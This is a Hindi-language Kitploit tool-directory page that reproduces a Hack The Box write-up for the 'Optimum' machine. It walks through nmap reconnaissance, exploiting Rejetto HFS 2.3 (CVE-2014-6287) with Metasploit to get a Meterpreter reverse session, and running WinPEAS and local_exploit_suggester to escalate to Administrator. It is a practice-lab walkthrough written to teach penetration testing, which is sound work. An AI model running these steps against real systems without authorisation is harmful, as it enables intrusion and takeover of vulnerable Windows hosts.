Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Optimum — # हैक द बॉक्स से ऑप्टिमम मशीन का राइटअप यह वॉकथ्रू Rejetto HttpFileServer 2.3 (CVE-2014-6287) के शोषण के माध्यम से प्रारंभिक पहुंच प्राप्त करने को कवर करता है, इसके बाद एन्यूमरेशन तकनीकों और पोस्ट-एक्सप्लॉइटेशन टूल्स का उपयोग करके विंडोज होस्ट पर विशेषाधिकार वृद्धि की जाती है। | Kitploit
उपकरण/GitHubGitHub/r3fr4kt/optimum
विशेषाधिकार वृद्धिटोहीभेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubr3fr4kt/optimum

Optimum

26 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

# हैक द बॉक्स से ऑप्टिमम मशीन का राइटअप यह वॉकथ्रू Rejetto HttpFileServer 2.3 (CVE-2014-6287) के शोषण के माध्यम से प्रारंभिक पहुंच प्राप्त करने को कवर करता है, इसके बाद एन्यूमरेशन तकनीकों और पोस्ट-एक्सप्लॉइटेशन टूल्स का उपयोग करके विंडोज होस्ट पर विशेषाधिकार वृद्धि की जाती है।

रिपॉजिटरी देखें

ऑप्टिमम


Optimum – Hack The Box राइटअप

अवलोकन

इस मशीन में, उद्देश्य एक विंडोज होस्ट पर एक कमज़ोर वेब सेवा का शोषण करके प्रारंभिक पहुँच प्राप्त करना और फिर एडमिनिस्ट्रेटर फ़्लैग प्राप्त करने के लिए विशेषाधिकारों को बढ़ाना है।

हमले के पथ में शामिल थे:

  • सेवा गणना (Service Enumeration)
  • Rejetto HTTP File Server 2.3 का शोषण
  • Metasploit के माध्यम से प्रारंभिक पहुँच
  • WinPEAS और Metasploit पोस्ट-एक्सप्लॉइटेशन मॉड्यूल का उपयोग करके विशेषाधिकार वृद्धि

टोह लेना (Reconnaissance)

हम खुली सेवाओं की पहचान करने के लिए एक पूर्ण TCP पोर्ट स्कैन से शुरू करते हैं।

root@kitploit:~
nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>

स्कैन से पोर्ट 80 खुला पता चलता है।

अगला, हम एक सेवा और संस्करण स्कैन करते हैं।

root@kitploit:~
nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>

परिणाम निम्नलिखित सेवा की पहचान करता है:

root@kitploit:~
HttpFileServer 2.3

यह सेवा Rejetto HTTP File Server से मेल खाती है, जो एक हल्का फ़ाइल-शेयरिंग वेब सर्वर है।


कमजोरी की पहचान (Vulnerability Identification)

पता लगाए गए संस्करण पर शोध करने के बाद, हम एक ज्ञात कमजोरी पाते हैं:

root@kitploit:~
CVE-2014-6287

यह कमजोरी अनुचित इनपुट सैनिटाइजेशन के कारण रिमोट कोड निष्पादन (Remote Code Execution) की अनुमति देती है।


शोषण (Exploitation)

कमजोरी का शोषण करने के लिए, हम Metasploit का उपयोग करते हैं।

Metasploit प्रारंभ करें:

root@kitploit:~
msfconsole -q

उपयुक्त मॉड्यूल खोजें:

root@kitploit:~
search rejetto

एक्सप्लॉइट मॉड्यूल लोड करें:

root@kitploit:~
use exploit/windows/http/rejetto_hfs_exec

आवश्यक विकल्प कॉन्फ़िगर करें:

root@kitploit:~
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run

निष्पादित होने पर, एक्सप्लॉइट लक्ष्य मशीन पर एक Meterpreter सत्र प्रदान करता है।


प्रारंभिक पहुँच (Initial Access)

प्राप्त Meterpreter सत्र के साथ, हम उपयोगकर्ता फ़्लैग प्राप्त करने के लिए फ़ाइलसिस्टम नेविगेट करते हैं।

root@kitploit:~
cd
cat user.txt
whoami

कमांड आउटपुट दर्शाता है कि हम इस प्रकार लॉग इन हैं:

root@kitploit:~
kostas

चूँकि इस उपयोगकर्ता के पास प्रशासनिक विशेषाधिकार नहीं हैं, हम विशेषाधिकार वृद्धि (Privilege Escalation) के साथ आगे बढ़ते हैं।


विशेषाधिकार वृद्धि गणना (Privilege Escalation Enumeration)

संभावित विशेषाधिकार वृद्धि वैक्टर की पहचान करने के लिए, हम WinPEAS अपलोड करते हैं, जो एक प्रसिद्ध विंडोज विशेषाधिकार वृद्धि गणना उपकरण है।

root@kitploit:~
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe

फिर हम इसे निष्पादित करते हैं:

root@kitploit:~
shell
.\wp.exe

आउटपुट में उपयोगी जानकारी सामने आती है, जिसमें उपयोगकर्ता kostas से जुड़े क्रेडेंशियल्स शामिल हैं।


विशेषाधिकार वृद्धि (Privilege Escalation)

संभावित वृद्धि वैक्टर की समीक्षा करने के बाद, हम Metasploit मॉड्यूल का उपयोग करते हैं:

root@kitploit:~
local_exploit_suggester

मॉड्यूल लोड करें:

root@kitploit:~
use post/multi/recon/local_exploit_suggester

सत्र कॉन्फ़िगर करें:

root@kitploit:~
set SESSION <SESSION_NUMBER>
run

यह मॉड्यूल उपलब्ध स्थानीय एक्सप्लॉइट्स का सुझाव देता है जिनका उपयोग विशेषाधिकार बढ़ाने के लिए किया जा सकता है।

सफलतापूर्वक विशेषाधिकार बढ़ाने के बाद, हमें प्रशासनिक अधिकारों वाला एक शेल मिलता है।

सत्यापन:

root@kitploit:~
shell
whoami

एडमिनिस्ट्रेटर पहुँच (Administrator Access)

एक बार प्रशासनिक विशेषाधिकार प्राप्त हो जाने पर, हम रूट फ़्लैग प्राप्त करने के लिए एडमिनिस्ट्रेटर निर्देशिका में नेविगेट करते हैं।

root@kitploit:~
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt

मुख्य बातें (Key Takeaways)

यह मशीन कई महत्वपूर्ण पेनिट्रेशन टेस्टिंग अवधारणाओं को प्रदर्शित करती है:

  • कमजोर सॉफ़्टवेयर की पहचान करने के लिए उचित सेवा गणना महत्वपूर्ण है।
  • CVE-2014-6287 जैसी सार्वजनिक रूप से ज्ञात कमजोरियाँ तत्काल रिमोट कोड निष्पादन की ओर ले जा सकती हैं।
  • WinPEAS जैसे उपकरण विंडोज वातावरण में विशेषाधिकार वृद्धि के अवसरों की पहचान करने में मदद करते हैं।
  • Metasploit पोस्ट-एक्सप्लॉइटेशन मॉड्यूल विशेषाधिकार वृद्धि प्रक्रिया को तेज कर सकते हैं।
टूल डाउनलोड करें